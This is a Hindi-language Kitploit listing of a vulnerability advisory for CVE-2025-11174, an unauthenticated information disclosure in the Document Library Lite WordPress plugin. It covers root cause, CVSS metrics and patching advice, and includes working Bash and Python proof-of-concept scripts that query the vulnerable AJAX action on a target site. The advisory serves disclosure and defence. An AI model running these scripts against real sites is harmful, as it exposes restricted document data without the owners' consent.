Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-11174 — दस्तावेज़ लाइब्रेरी लाइट <= 1.1.6 - संवेदनशील जानकारी के प्रकटीकरण के लिए अनधिकृत पहुंच की कमी | CVE-2025-11174 | Kitploit
उपकरण/GitHubGitHub/snailsploit/cve-2025-11174
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

दस्तावेज़ लाइब्रेरी लाइट <= 1.1.6 - संवेदनशील जानकारी के प्रकटीकरण के लिए अनधिकृत पहुंच की कमी | CVE-2025-11174

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-11174: Document Library Lite WordPress प्लगइन में बिना प्रमाणीकरण के सूचना प्रकटीकरण

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

कीवर्ड: CVE-2025-11174, Document Library Lite कमजोरी, सूचना प्रकटीकरण, WordPress सुरक्षा, बिना प्रमाणीकरण का AJAX शोषण, WordPress प्लगइन कमजोरी, CWE-862, WordPress दस्तावेज़ प्लगइन सुरक्षा, प्राधिकरण बाईपास, WordPress CVE 2025

विषय सूची

  • अवलोकन
  • कमजोरी का विवरण
  • तकनीकी विश्लेषण
  • हमला वेक्टर
  • सबूत की अवधारणा
  • सुधार मार्गदर्शिका
  • पहचान
  • CVSS मीट्रिक्स
  • सन्दर्भ
  • श्रेय
  • सुरक्षा संपर्क

अवलोकन

Document Library Lite WordPress प्लगइन सूचना प्रकटीकरण कमजोरी (CVE-2025-11174) – सुरक्षा दोष जो WordPress दस्तावेज़ लाइब्रेरी प्लगइन में संवेदनशील दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देता है।

एक महत्वपूर्ण प्राधिकरण बाईपास कमजोरी Document Library Lite WordPress प्लगइन में खोजी गई है, जो बिना प्रमाणीकरण के हमलावरों को संवेदनशील दस्तावेज़ जानकारी तक पहुंचने की अनुमति देती है।

खोजकर्ता: Kai Aizen और Avraham Shemesh (SnailSploit)
प्रकाशित: 1 नवंबर 2025
CVSS स्कोर: 5.3 (मध्यम)
CWE: CWE-862 – अनुपस्थित प्राधिकरण
प्लगइन: Document Library Lite
विक्रेता: Barn2 Plugins
हमले का प्रकार: बिना प्रमाणीकरण के सूचना प्रकटीकरण
आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण का हमला)

कमजोरी का विवरण

विवरण

Document Library Lite प्लगइन (WordPress के लिए) में सभी संस्करणों तक 1.1.6 तक एक अनुचित प्राधिकरण कमजोरी है। प्लगइन एक बिना प्रमाणीकरण के AJAX एक्शन dll_load_posts को उजागर करता है जो बिना nonce या क्षमता जांच के दस्तावेज़ डेटा की JSON तालिका लौटाता है।

प्रभाव

यह कमजोरी बिना प्रमाणीकरण के हमलावरों को इसकी अनुमति देती है:

  • बिना प्राधिकरण के दस्तावेज़ मेटाडेटा तक पहुंच
  • प्रतिबंधित होने वाली दस्तावेज़ सूची प्राप्त करना
  • केवल प्रमाणित उपयोगकर्ताओं के लिए इच्छित दस्तावेज़ जानकारी देखना
  • Document Library में संग्रहीत दस्तावेज़ों की गणना करना

नोट: 5.3 का CVSS स्कोर (मध्यम गंभीरता) सीमित सूचना प्रकटीकरण को दर्शाता है। जबकि कमजोरी दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देती है, गोपनीयता पर प्रभाव को निम्न (Low) के रूप में रेट किया गया है, जिसका अखंडता या उपलब्धता पर कोई प्रभाव नहीं है।

प्रभावित संस्करण

  • कमजोर: सभी संस्करण ≤ 1.1.6
  • पैच किया गया: संस्करण 1.1.7 और उससे ऊपर

CVSS v3.1 मीट्रिक्स

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
मीट्रिकमान
हमला वेक्टरनेटवर्क (AV:N)
हमला जटिलतानिम्न (AC:L)
आवश्यक विशेषाधिकारकोई नहीं (PR:N)
उपयोगकर्ता सहभागिताकोई नहीं (UI:N)
दायराअपरिवर्तित (S:U)
गोपनीयतानिम्न (C:L)
अखंडताकोई नहीं (I:N)
उपलब्धताकोई नहीं (A:N)

CVSS v3.1 विवरण:

  • हमला वेक्टर (AV): नेटवर्क – कमजोरी का दूरस्थ रूप से नेटवर्क पर शोषण किया जा सकता है
  • हमला जटिलता (AC): निम्न – शोषण के लिए कोई विशेष शर्तें आवश्यक नहीं हैं
  • आवश्यक विशेषाधिकार (PR): कोई नहीं – कोई प्रमाणीकरण या विशेषाधिकार आवश्यक नहीं हैं
  • उपयोगकर्ता सहभागिता (UI): कोई नहीं – शोषण बिना किसी उपयोगकर्ता सहभागिता के काम करता है
  • दायरा (S): अपरिवर्तित – कमजोरी केवल कमजोर घटक को प्रभावित करती है
  • गोपनीयता प्रभाव (C): निम्न – सीमित सूचना प्रकटीकरण
  • अखंडता प्रभाव (I): कोई नहीं – कोई अखंडता प्रभाव नहीं
  • उपलब्धता प्रभाव (A): कोई नहीं – कोई उपलब्धता प्रभाव नहीं

तकनीकी विवरण

कमजोरी का मूल कारण

AJAX एक्शन dll_load_posts उचित प्रमाणीकरण या प्राधिकरण जांच के बिना पंजीकृत है:

// कमजोर कोड पैटर्न (सरलीकृत)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

wp_ajax_nopriv_ उपसर्ग इंगित करता है कि यह एक्शन बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ है, और कॉलबैक फ़ंक्शन इन्हें लागू नहीं करता है:

  • Nonce सत्यापन
  • क्षमता जांच
  • उपयोगकर्ता प्रमाणीकरण सत्यापन

हमला वेक्टर

POST /wp-admin/admin-ajax.php
action=dll_load_posts

कमजोरी का शोषण बिना प्रमाणीकरण के WordPress के admin-ajax.php एंडपॉइंट के माध्यम से किया जा सकता है।

सबूत की अवधारणा

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

Bash PoC

#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "उपयोग: $0 <लक्ष्य_url>"
    echo "उदाहरण: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC"
echo "[*] लक्ष्य: $TARGET_URL"
echo ""

# कमजोर AJAX एंडपॉइंट पर अनुरोध भेजें
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] यदि आप ऊपर दस्तावेज़ डेटा देखते हैं, तो साइट कमजोर है!"

Python PoC

#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] लक्ष्य: {target_url}")
    print(f"[*] AJAX एंडपॉइंट: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] अनुरोध सफल!\n")
            try:
                json_data = response.json()
                print("[+] प्राप्त दस्तावेज़ डेटा:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] साइट CVE-2025-11174 के लिए कमजोर है")
            except json.JSONDecodeError:
                print("[-] कोई JSON प्रतिक्रिया प्राप्त नहीं हुई")
                print(f"प्रतिक्रिया: {response.text[:200]}")
        else:
            print(f"[-] अनुरोध स्थिति कोड के साथ विफल: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] त्रुटि: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"उपयोग: {sys.argv[0]} <लक्ष्य_url>")
        print(f"उदाहरण: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

सुधार

साइट प्रशासकों के लिए

तत्काल कार्रवाई आवश्यक:

  1. Document Library Lite को संस्करण 1.1.7 या बाद में तुरंत अपडेट करें
  2. action=dll_load_posts के साथ admin-ajax.php पर संदिग्ध POST अनुरोधों के लिए अपनी साइट के एक्सेस लॉग की समीक्षा करें
  3. यदि आप तुरंत अपडेट नहीं कर सकते हैं, तो प्लगइन को अस्थायी रूप से अक्षम करने पर विचार करें

अपडेट निर्देश

WordPress प्रशासन के माध्यम से:

  1. WordPress प्रशासन में प्लगइन्स > स्थापित प्लगइन्स पर जाएं
  2. "Document Library Lite" ढूंढें
  3. अभी अपडेट करें पर क्लिक करें (संस्करण 1.1.7 या बाद में अपग्रेड करें)
  4. सुनिश्चित करें कि अपडेट सफल रहा

WP-CLI का उपयोग करके:

wp plugin update document-library-lite

प्लगइन डेवलपर्स के लिए

सुनिश्चित करें कि सभी AJAX हैंडलर उचित सुरक्षा नियंत्रण लागू करें:

// उचित AJAX सुरक्षा का उदाहरण
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
टूल डाउनलोड करें